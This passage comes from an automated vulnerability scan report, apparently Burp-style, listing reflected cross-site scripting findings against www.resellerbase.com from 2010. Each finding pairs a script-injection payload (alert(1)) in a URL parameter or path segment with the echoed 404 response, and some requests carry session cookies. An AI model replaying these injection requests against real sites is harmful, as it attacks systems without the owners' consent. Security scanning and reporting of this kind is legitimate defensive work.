HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php8e899<script>alert(1)</script>efa70996aa5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.834. http://www.resellerbase.com/detail/10/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 94fb8<a>fd89e68c8a7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/search.php?keyword=search...&Submit3=Search94fb8<a>fd89e68c8a7&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php?keyword=search...&Submit3=Search94fb8<a>fd89e68c8a7&opt=2 was not found on this server.</p>
...[SNIP]...

2.835. http://www.resellerbase.com/detail/10/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9588a<a>ea239c42dcc was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/search.php?keyword=search...9588a<a>ea239c42dcc&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php?keyword=search...9588a<a>ea239c42dcc&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.836. http://www.resellerbase.com/detail/10/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18e41<script>alert(1)</script>31b6763028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/search.php?keyword=search...&Submit3=Search&opt=2&18e41<script>alert(1)</script>31b6763028=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php?keyword=search...&Submit3=Search&opt=2&18e41<script>alert(1)</script>31b6763028=1 was not found on this server.</p>
...[SNIP]...

2.837. http://www.resellerbase.com/detail/10/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3a8a5<a>3665cf3a6cb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/search.php?keyword=search...&Submit3=Search&opt=23a8a5<a>3665cf3a6cb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php?keyword=search...&Submit3=Search&opt=23a8a5<a>3665cf3a6cb was not found on this server.</p>
...[SNIP]...

2.838. http://www.resellerbase.com/detail/10/telebay-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/telebay-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1fe46<script>alert(1)</script>84450f56124 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1fe46<script>alert(1)</script>84450f56124/10/telebay-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1fe46<script>alert(1)</script>84450f56124/10/telebay-com.html was not found on this server.</p>
...[SNIP]...

2.839. http://www.resellerbase.com/detail/10/telebay-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/10/telebay-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ec2a<a>102051a593a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/104ec2a<a>102051a593a/telebay-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/104ec2a<a>102051a593a/telebay-com.html was not found on this server.</p>
...[SNIP]...

2.840. http://www.resellerbase.com/detail/10/telebay-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/telebay-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7fa2<script>alert(1)</script>713c15e9369 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/d7fa2<script>alert(1)</script>713c15e9369 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/d7fa2<script>alert(1)</script>713c15e9369 was not found on this server.</p>
...[SNIP]...

2.841. http://www.resellerbase.com/detail/10/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 60eff<script>alert(1)</script>8499bc1d663 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail60eff<script>alert(1)</script>8499bc1d663/10/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail60eff<script>alert(1)</script>8499bc1d663/10/themes/ was not found on this server.</p>
...[SNIP]...

2.842. http://www.resellerbase.com/detail/10/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 444fb<script>alert(1)</script>1e7ba32b487 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10444fb<script>alert(1)</script>1e7ba32b487/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10444fb<script>alert(1)</script>1e7ba32b487/themes/ was not found on this server.</p>
...[SNIP]...

2.843. http://www.resellerbase.com/detail/10/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5c016<script>alert(1)</script>792fdeb6a51 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes5c016<script>alert(1)</script>792fdeb6a51/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes5c016<script>alert(1)</script>792fdeb6a51/ was not found on this server.</p>
...[SNIP]...

2.844. http://www.resellerbase.com/detail/10/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 579e8<script>alert(1)</script>bfb200cb3ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/?579e8<script>alert(1)</script>bfb200cb3ce=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/?579e8<script>alert(1)</script>bfb200cb3ce=1 was not found on this server.</p>
...[SNIP]...

2.845. http://www.resellerbase.com/detail/10/themes/kosmos/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 589b1<script>alert(1)</script>25bd190d50c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail589b1<script>alert(1)</script>25bd190d50c/10/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail589b1<script>alert(1)</script>25bd190d50c/10/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.846. http://www.resellerbase.com/detail/10/themes/kosmos/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 31aa7<script>alert(1)</script>00193d40249 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1031aa7<script>alert(1)</script>00193d40249/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1031aa7<script>alert(1)</script>00193d40249/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.847. http://www.resellerbase.com/detail/10/themes/kosmos/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 641f8<script>alert(1)</script>b42a1a62195 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes641f8<script>alert(1)</script>b42a1a62195/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes641f8<script>alert(1)</script>b42a1a62195/kosmos/ was not found on this server.</p>
...[SNIP]...

2.848. http://www.resellerbase.com/detail/10/themes/kosmos/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload af621<script>alert(1)</script>d160fb4faa8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmosaf621<script>alert(1)</script>d160fb4faa8/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmosaf621<script>alert(1)</script>d160fb4faa8/ was not found on this server.</p>
...[SNIP]...

2.849. http://www.resellerbase.com/detail/10/themes/kosmos/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc6b5<script>alert(1)</script>37472bfcfad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmos/?fc6b5<script>alert(1)</script>37472bfcfad=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes/kosmos/?fc6b5<script>alert(1)</script>37472bfcfad=1 was not found on this server.</p>
...[SNIP]...

2.850. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 4ae67<script>alert(1)</script>3f8cbbc8dd4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail4ae67<script>alert(1)</script>3f8cbbc8dd4/10/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail4ae67<script>alert(1)</script>3f8cbbc8dd4/10/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.851. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9fcc<script>alert(1)</script>2f2dde044d7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10e9fcc<script>alert(1)</script>2f2dde044d7/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10e9fcc<script>alert(1)</script>2f2dde044d7/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.852. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 149c5<script>alert(1)</script>5fc4f32a215 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes149c5<script>alert(1)</script>5fc4f32a215/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/themes149c5<script>alert(1)</script>5fc4f32a215/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.853. http://www.resellerbase.com/detail/10/themes/kosmos/images/ [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/10/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c0efe<script>alert(1)</script>fd472053f89 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/themes/kosmosc0efe<script>alert(1)</script>fd472053f89/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:08 GMT
